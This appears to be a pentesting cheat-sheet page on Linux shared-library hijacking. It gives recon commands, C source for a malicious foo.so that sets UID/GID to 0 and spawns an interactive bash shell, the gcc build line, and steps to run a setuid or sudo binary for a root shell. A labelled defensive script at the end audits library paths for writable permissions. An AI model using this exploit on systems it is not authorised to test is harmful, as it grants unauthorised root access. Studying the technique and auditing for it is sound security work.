
Shared Library Hijacking

Last updated 1 year ago

When a binary is setuid or can be run with sudo, inspect its strings (and trace or debug it) to see which shared libraries it loads.

strings ./example
strace ./example
gdb ./example

...
foo.so
...

If the binary loads a shared library (e.g. foo.so) and we can modify that library file, we can replace it and get a root shell.

find / -type f -name "foo.so" 2>/dev/null
ls -al /path/to/foo.so

drwxrwxrwx 1 user user 64 Dec 15 09:13 foo.so

Create "foo.c".

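#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

/* Function exported by the replacement library. */
void foo(void) {
    /* Switch to root's UID and GID. */
    setuid(0);
    setgid(0);
    /* Start an interactive shell. */
    system("/bin/bash -i");
}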

Then compile it into a shared object.

gcc -shared -fPIC -nostartfiles -o foo.so foo.c

Copy the shared object to /path/to/foo.so, then run the binary.

./example
# or
sudo ./example
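
The condition this page depends on is a library file (or its directory) that a non-root user can write to. The script below is an added example, not part of the original page: it lists the libraries a privileged binary resolves and reports any that fail that check. The function names and the TRUSTED_UID variable are assumptions of this sketch.

```shell
#!/bin/sh
# Added example: audit a privileged binary's shared libraries for write access
# by untrusted users. Function names and TRUSTED_UID are assumptions of this sketch.
TRUSTED_UID=${TRUSTED_UID:-0}   # only this uid may own libraries and their dirs

# lib_paths BINARY: print the absolute library paths the dynamic loader resolves.
# ldd may run code from the target, so use it only on binaries you already trust;
# libraries loaded later with dlopen() are not listed (strace shows those).
lib_paths() {
    ldd "$1" 2>/dev/null | awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }'
}

# path_issue PATH: print why PATH is modifiable by an untrusted user, or nothing.
path_issue() {
    # -L follows symlinks (library names are often links), -n prints numeric ids.
    meta=$(ls -ldLn -- "$1" 2>/dev/null) || { echo "missing"; return 0; }
    mode=${meta%% *}                                      # e.g. -rwxrwxrwx
    owner=$(printf '%s\n' "$meta" | awk '{ print $3 }')   # numeric owner uid
    case $mode in
        ????????w*) echo "world-writable"; return 0 ;;
        ?????w*)    echo "group-writable"; return 0 ;;
    esac
    [ "$owner" = "$TRUSTED_UID" ] || echo "owned by uid $owner"
}

# audit_paths: read library paths on stdin and report each file or parent
# directory that fails path_issue (a writable directory allows replacement too).
audit_paths() {
    while IFS= read -r lib; do
        [ -n "$lib" ] || continue
        for p in "$lib" "$(dirname -- "$lib")"; do
            issue=$(path_issue "$p")
            [ -z "$issue" ] || printf '%s: %s\n' "$p" "$issue"
        done
    done
}

# Usage: sh audit.sh /path/to/binary
[ "$#" -eq 0 ] || lib_paths "$1" | audit_paths
```

Any line it prints is a file or directory to return to root ownership with mode 755 or stricter (644 for the library file itself).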